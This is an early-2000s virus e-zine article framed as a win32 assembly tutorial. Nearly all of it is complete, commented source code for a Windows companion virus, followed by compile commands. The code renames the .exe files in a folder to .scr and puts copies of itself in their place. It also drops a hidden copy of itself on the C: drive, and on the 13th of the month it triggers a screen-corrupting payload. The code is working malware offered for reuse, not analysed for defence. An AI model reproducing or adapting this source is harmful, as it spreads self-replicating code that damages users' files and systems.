The Revoluti0n
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - Starting with win32asm by NeKr0
Hi, this is my old article, translated from the russian e-zine "Habitat".
In this article I'll show how to easy write in win32asm. Forget your HLL and
use power of pure asm (hi philie ;) .
This companion virus is written in tasm syntaxis. It works in current
folder: searches *.exe files, renames it to *.scr and writes itself to
found file name, makes hidden dropper in c:\ . Checks date and if day=13
shows graphical payload (bloody fog).
When you code in win32asm you must declare all API that your program uses.
Like this:
;====================== tasm directives
.386 ;
.model flat ;flat memory model (wind0ze works in this model)
;====================== API list
extrn FindFirstFileA:proc
extrn FindNextFileA:proc
extrn SetFileAttributesA:proc
extrn MoveFileA:proc
extrn CopyFileA:proc
extrn GetCommandLineA:proc
extrn CreateProcessA:proc
extrn lstrcpyA:proc
extrn ExitProcess:proc
extrn CreateFileA:proc
extrn CloseHandle:proc
extrn MessageBoxA:proc
extrn GetDC:proc
extrn SetPixel:proc
extrn GetSystemMetrics:proc
extrn ExitProcess:proc
extrn GetSystemTime:proc
extrn MessageBoxA:proc
;====================== end of API list
Next. We need a place to store our values. Better way - store it in data
segment
;====================== data segment
.data ; declaration segment of data
Tdate: ;Place for date/time values
Tyear dw 0
Tmonth dw 0
Tdow dw 0
Tday dw 0
Thour dw 0
Tmin dw 0
Tsec dw 0
Tmilsec dw 0
xcoord dd 0 ;There be width of screen
ycoord dd 0 ; ------ height of screen
newx dd 0 ;Coords for dots
newy dd 0 ;
dc dd 0 ;Handle of screen
exe db '*.EXE',0 ;mask for searching
FHandle dd 0 ;file handle
processinf dd 4 dup (0) ; PROCESS_INFORMATION
startupinf dd 4 dup (0) ; STARTUPINFO
SearchRec db 44 dup (0) ;There is region for searh data-|
FileName db 274 dup (0) ;file name in search data -|
NewName db 260 dup (0) ;array for new file name
MyName db 260 dup (0) ;array for virus name
filehandle dd 0 ;file handle
drp db 'c:\w32worm.exe',0 ;path & file name for dropper
CopyLeft db ' [Win32.Companion by NeKr0!] ',0 ; copyleft
txt db '!! Vivat Egor Letov !!',0 ; My favorit singer
;====================== end of data segment
Yeah. Time to write code.
;====================== code segment
.code ;declaration code segment
worm:
call GetCommandLineA ;Get command line
push eax ;pointer to command line
push offset MyName ;pointer to array for vius name
call lstrcpyA ;copy
mov edi,eax ;pointer to virus name
search:
cmp byte ptr [edi], '.' ;compare char
jz found_dot ;if char='.' then go out
inc edi ;add edi 1
jmp search ;search again
found_dot:
mov esi,edi ;store pointer to dot in esi
inc esi ;add esi 1
add edi,4
mov byte ptr [edi],00 ;write 0 after file name
infect: ;
push offset SearchRec ;see data segment
push offset exe ;mask for search
call FindFirstFileA ;search
mov dword ptr [FHandle],eax ;search handle
check_exe:
cmp eax,-1 ;check for errors
je Drop ;like a '*.exe not found'
or eax,eax ;
jz Drop ;if error - make dropper
infect_file: ;
push offset FileName ;
push offset NewName ;
call lstrcpyA ;copy name of found file in our array
mov edi,eax ;pointer to copied file name
search_2:
cmp byte ptr [edi],'.' ;search dot in file name
jz found_dot2 ;
inc edi ;
jmp search_2 ;
found_dot2:
inc edi ;
mov dword ptr [edi],'rcs' ;change extention to SCR
mov byte ptr [edi+3],0 ;add 0 after file name
push offset NewName ;
push offset FileName ;
call MoveFileA ;rename exe to scr
or eax,eax ;check errors
jz Next ;if error - find next file
push 1 ;
push offset FileName ;
push offset MyName+1 ;Why MyName+1? Coz in wind0ze when
;you run file, it runs as "file.exe"
;and MyName="file.exe
;add 1 and MyName=file.exe
call CopyFileA ;Copy our body with found file name
Next:
push offset SearchRec ;
push dword ptr [FHandle] ;
call FindNextFileA ;Search next file
jmp check_exe ;
drop: ;Make dropper
push 0 ;
push offset drp ;
push offset MyName+1 ;
call CopyFileA ;Copy our body to c:\
push 00000001h OR 00000002h ;
lea eax,drp ;
push eax ;
call SetFileAttributesA ;Set attributes: hidden
runz: ;
push offset Tdate ;Check date
call GetSystemTime
cmp Tday,13 ; Doom day?
je payload ; Yeah!!!
push offset processinf ;In other days run host program
push offset startupinf ;
sub eax,eax ;
push eax ;
push eax ;
push 10h ;
push eax ;
push eax ;
push eax ;
call GetCommandLineA ;
inc eax ;
push eax ;
mov dword ptr [esi],'rcs' ;esi still point to name of executed file
;change extention of it file
push offset MyName+1 ;
call CreateProcessA ;and run it
push 0 ;
call ExitProcess ;Go out here
payload: ;Kinda payload :)
push 0
push offset CopyLeft
push offset txt
push 0
call MessageBoxA ;Horror MessageBox
xor eax,eax ;
push eax
call GetDC
mov dword ptr dc,eax ;Bllody fog there
push 16 ;Learn asm if you are interested
call GetSystemMetrics ;what it does :p
mov dword ptr xcoord,eax
push 17
call GetSystemMetrics ;
mov dword ptr ycoord,eax
next_pix:
mov eax,dword ptr xcoord ;
push eax
call random
mov dword ptr newx,eax
mov eax,dword ptr ycoord ;
push eax
call random
mov 4 ptr newy,eax
push 200 ;
push newy ;
push newx ;
push dc ;
call SetPixel ;
jmp next_pix ;
random proc ;Random procedure
;where did i steal it? i forgot :)
push edx ;
a2a: db 0fh, 31h ;
;
xor edx, edx ;
div dword ptr [esp+8] ;
in al,40h ;
add dl,al ;
xchg eax, edx ;
r_out: pop edx ;
ret 4 ;
random endp
ends
end worm ;Kinda end of virus
;yeah! you have a simple windows wirus!!!
;================ end of code
To compile this use batch file:
======================================= make.bat
tasm32.exe /mx /m3 worm.asm,,;
tlink32.exe /Tpe /aa /c /v worm.obj,,, import32.lib,
=======================================
P.S.: sorry for my english :)
(c) 2002 NeKr0! (from Habitat e-zine)